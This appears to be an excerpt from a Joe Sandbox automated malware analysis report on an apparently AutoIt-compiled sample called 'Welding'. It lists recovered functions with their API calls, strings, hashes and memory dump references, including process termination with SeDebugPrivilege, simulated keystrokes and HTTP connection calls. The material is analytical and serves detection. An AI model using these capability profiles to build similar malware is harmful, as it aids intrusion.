Part of subcall function 00122B4F: SetEvent.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B79

Strings

, xrefs: 001221CD

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: a3f7e06da839b0e08d1e24d48116d59603c1711a0e336add5b8c0e8cfdb5c3ae
Instruction ID: 5ed6af1e3ddc3be799fc638edaffa61073cd18a135676b273090a2dc3eec67b0
Opcode Fuzzy Hash: a3f7e06da839b0e08d1e24d48116d59603c1711a0e336add5b8c0e8cfdb5c3ae
Instruction Fuzzy Hash: 50419DB5500228BFEB129F60DC89FBF7BACEF09354F004116FA049A151DB759E64CBA1

Function 00129330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00140980), ref: 00129412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00140980), ref: 00129446
#164.OLEAUT32(?,?,?,?,?,?,00140980), ref: 001295C0
#6.OLEAUT32(?,?,?,00140980), ref: 001295EA

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #164FileFreeLibraryModuleName
String ID:
API String ID: 2716333841-0
Opcode ID: 83e2f3390e8ae2d7c7d820885746c38b2f023f949bc86152a25b6c724f455555
Instruction ID: 864b703a2bcb0549948a5ea6d72e5cf44022a231eb66c05577856885bbbc905f
Opcode Fuzzy Hash: 83e2f3390e8ae2d7c7d820885746c38b2f023f949bc86152a25b6c724f455555
Instruction Fuzzy Hash: 27F12B75A00219EFCB14DFA8D884EAEB7B9FF49314F108059F906AB261DB31AE55CB50

Function 0012FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0012FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00130133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00130165
CloseHandle.KERNEL32(?), ref: 00130194
CloseHandle.KERNEL32(?), ref: 0013020B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 415833967efbf9dfc2849eaa38759ef1dca82cc5424444830301e02a456ec09f
Instruction ID: 6b1b81bd26286c8b8406ef5b07e3cc9f7a44bd6e6072fa3994280c45a425b3c2
Opcode Fuzzy Hash: 415833967efbf9dfc2849eaa38759ef1dca82cc5424444830301e02a456ec09f
Instruction Fuzzy Hash: 78E19D31204341DFC719EF24D891BAABBE1BF89310F15896DF9899B2A2DB31DD41CB52

Function 0011527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00113B8A,?), ref: 00114BE0

Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00113B8A,?), ref: 00114BF9

Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED

lstrcmpiW.KERNEL32(?,?), ref: 001152FB
_wcscmp.LIBCMT ref: 00115315
MoveFileW.KERNEL32(?,?), ref: 00115330

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: a6140649c90fe0ec2971ef63a673a3485d1399ff9d1a8914a2a50b394300c3ca
Instruction ID: ebd97f61c5d3206fc4c22d09dc857c3d746f64e71e40f0170b971eea5c71651f
Opcode Fuzzy Hash: a6140649c90fe0ec2971ef63a673a3485d1399ff9d1a8914a2a50b394300c3ca
Instruction Fuzzy Hash: 105184B20087859BC728DBA4D881DDFB7ECAF95310F50092EF189D3152EF74A6C98766

Function 00138C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00138D24

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 92d940dd1969b436e087f22ded5d85f3e1a4f48da7d1db9262e14a20fe99f2e8
Instruction ID: fc159520a88566e720344e82d24703b88c4d74acfdd0b8a35fbbc985a0753e86
Opcode Fuzzy Hash: 92d940dd1969b436e087f22ded5d85f3e1a4f48da7d1db9262e14a20fe99f2e8
Instruction Fuzzy Hash: DD51AD30641304BFEF249F68CC89BE97BA4AB15360F244525FA15EB5E2CF71AD90CB61

Function 000B2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000EC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000EC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000EC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000EC6B1
DestroyIcon.USER32(00000000), ref: 000EC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000EC6DD
DestroyIcon.USER32(?), ref: 000EC6EC

Part of subcall function 0013AAD4: DeleteObject.GDI32(00000000), ref: 0013AB0D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: d6f65b20cc727ab2f89c92a82d23cc40362dcd98cb5e3f8daebb66ddd49683ad
Instruction ID: 0d8d1d5b4112d2d430dd5e93cb48381a4825e6ce6d5149a0d33977f5535e1d4b
Opcode Fuzzy Hash: d6f65b20cc727ab2f89c92a82d23cc40362dcd98cb5e3f8daebb66ddd49683ad
Instruction Fuzzy Hash: EF51A770A0020AAFEB20DF25DC45FBA7BF5EB48710F100528F946A76A0DB71ED91DB60

Function 0010A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0010B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0010B54D
Part of subcall function 0010B52D: GetCurrentThreadId.KERNEL32 ref: 0010B554
Part of subcall function 0010B52D: AttachThreadInput.USER32(00000000,?,0010A23B,?,00000001), ref: 0010B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0010A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0010A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0010A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0010A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0010A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0010A2B3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: dd45f54e5bf9242e822fa8529b3f779d4c77a6a412d32a3edeb0f0927ad369ea
Instruction ID: 521352af250dbefbcf2df42a7c57bb1f51d8cc4346d37ccbf73920482879e9c4
Opcode Fuzzy Hash: dd45f54e5bf9242e822fa8529b3f779d4c77a6a412d32a3edeb0f0927ad369ea
Instruction Fuzzy Hash: 0F1104B5950218BFF6116F619C8AF6A3F2DEF4D750F510429F3406B0E0CAF35C909AA0

Function 001094D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0010915A,00000B00,?,?), ref: 001094E2
HeapAlloc.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 001094E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0010915A,00000B00,?,?), ref: 001094FE
GetCurrentProcess.KERNEL32(?,00000000,?,0010915A,00000B00,?,?), ref: 00109506
DuplicateHandle.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 00109509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0010915A,00000B00,?,?), ref: 00109519
GetCurrentProcess.KERNEL32(0010915A,00000000,?,0010915A,00000B00,?,?), ref: 00109521
DuplicateHandle.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 00109524
CreateThread.KERNEL32(00000000,00000000,0010954A,00000000,00000000,00000000), ref: 0010953E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 8c600e49440cf1a498d3fe9c9a2f20e49f82fce051e81187f579b09cf9bcd05f
Instruction ID: 1e6bf85a4d632384b0c0cbaa3e8c0037541c7e85a3e0cdc9d7a4a70dc2cd94de
Opcode Fuzzy Hash: 8c600e49440cf1a498d3fe9c9a2f20e49f82fce051e81187f579b09cf9bcd05f
Instruction Fuzzy Hash: F501BBB9240304BFE711ABA6DC4DF6B7BACEB89B11F004411FB05DB5A1CA71D840CB20

Function 0012A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0012A265
NULL Pointer assignment, xrefs: 0012A28E, 0012A5B2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f4af657839ad7d5e803fce08e2002c0acecacc4d551bd074eb6a58a28e551e36
Instruction ID: 343a2b2bf3f2ff94ef4b59a32ea4f8293d2a4e375ef0e8c95bdc8c9ffaef1815
Opcode Fuzzy Hash: f4af657839ad7d5e803fce08e2002c0acecacc4d551bd074eb6a58a28e551e36
Instruction Fuzzy Hash: 06C1A371A0022A9FDF14DF98E884AAEB7F5FF48310F548469E905EB281E770ED54CB91

Function 001297FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00129851
#8.OLEAUT32(?), ref: 00129922
#8.OLEAUT32(?,?,?,?), ref: 00129A23
#9.WSOCK32(?), ref: 00129A2D
#9.WSOCK32(?,?), ref: 00129A8A

Strings

Null Object assignment in FOR..IN loop, xrefs: 001298B2, 001299E0, 00129A98
Incorrect Object type in FOR..IN loop, xrefs: 00129A06

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2102423945-625585964
Opcode ID: 4b1cb05a347bf48eb669a2a3dacec90367e77b6116990c8ae370f1a57811ebaf
Instruction ID: 2311c6dac61ab0e54ae6f4dd45d30c32e2f5f7bc61085aecec65dad1093fc125
Opcode Fuzzy Hash: 4b1cb05a347bf48eb669a2a3dacec90367e77b6116990c8ae370f1a57811ebaf
Instruction Fuzzy Hash: A5919E70A00329ABDF24CFA9D884FEEBBB8EF45714F10855DF515AB251D7709950CBA0

Function 00129E47 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00107D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?,?,00108073), ref: 00107D45
Part of subcall function 00107D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D60
Part of subcall function 00107D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D6E
Part of subcall function 00107D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?), ref: 00107D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00129EF0
_memset.LIBCMT ref: 00129EFD
_memset.LIBCMT ref: 0012A040
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0012A06C
CoTaskMemFree.OLE32(?), ref: 0012A077

Strings

NULL Pointer assignment, xrefs: 0012A0C5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 872287e33e33d170b1178cf6ae2bcf1391722b9a7d7cd15e438f5fc901633d6d
Instruction ID: ee563327252b1c650774aa24e426a94f7d86f24a1d6eed8dcc71783c02eaf701
Opcode Fuzzy Hash: 872287e33e33d170b1178cf6ae2bcf1391722b9a7d7cd15e438f5fc901633d6d
Instruction Fuzzy Hash: DE914771D00229EBDB10DFA5DC81EDEBBB9EF09310F10811AF519A7292DB719A54CFA0

Function 001373A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00137449
SendMessageW.USER32(?,00001036,00000000,?), ref: 0013745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00137477
_wcscat.LIBCMT ref: 001374D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 001374E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00137517

Strings

SysListView32, xrefs: 0013741B

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 09dd9e5b108ae245c0a7a1b82828a900f0d85b75b451735dfc538af0ae98cbd9
Instruction ID: 172df96b062475fa945900553a7e7d3e9cf76425f73426f293ff0775901245fa
Opcode Fuzzy Hash: 09dd9e5b108ae245c0a7a1b82828a900f0d85b75b451735dfc538af0ae98cbd9
Instruction Fuzzy Hash: E14184B1904348AFEB219F64CC85BEE77A8EF48350F10442AFA89A71D1D7719D94CB60

Function 0012F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00114148: CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
Part of subcall function 00114148: Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
Part of subcall function 00114148: CloseHandle.KERNEL32(00000000), ref: 00114245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012F08D
GetLastError.KERNEL32 ref: 0012F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 0012F14C
GetLastError.KERNEL32(00000000), ref: 0012F157
CloseHandle.KERNEL32(00000000), ref: 0012F18C

Strings

SeDebugPrivilege, xrefs: 0012F0AB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: be0078da1f34536fd794dcb6b162c6aa169edf00d0e48e8e5b81080d6eed6713
Instruction ID: 093974f8e42e6cd5b5836810cb1aca9cee8760c4a4798af401d6df9fffbbe427
Opcode Fuzzy Hash: be0078da1f34536fd794dcb6b162c6aa169edf00d0e48e8e5b81080d6eed6713
Instruction Fuzzy Hash: 9041CD302002019FD715EF24DCA5FADB7A2AF94714F04842CF9428B2D3CBB0A965CB86

Function 000C56F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00100C5B

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

_memset.LIBCMT ref: 000C5787
_wcscpy.LIBCMT ref: 000C57DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C57EB
__swprintf.LIBCMT ref: 00100CD1

Strings

AutoIt - , xrefs: 000C5760
Line %d: , xrefs: 00100CCB

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: 1cadbb0f0705499740fd5538dd58ce8d10e1e79dd774ef876b86df49860127a8
Instruction ID: 0e5dea909fe04ebf0f04a3af1464cfe757adf1c8a0e62854cd1c074a2155165f
Opcode Fuzzy Hash: 1cadbb0f0705499740fd5538dd58ce8d10e1e79dd774ef876b86df49860127a8
Instruction Fuzzy Hash: 27418071408304AAD322EB60DC85FDF77ECAF59350F00062EF199921A3EB70A689C792

Function 001134DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0011357C

Strings

stop, xrefs: 0011354D
warning, xrefs: 00113565
blank, xrefs: 001134FE
info, xrefs: 0011351D
question, xrefs: 00113535

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 65b025212073cf8be1707e29ae6b6539c018a30854b5f8e2034680d1705f0f40
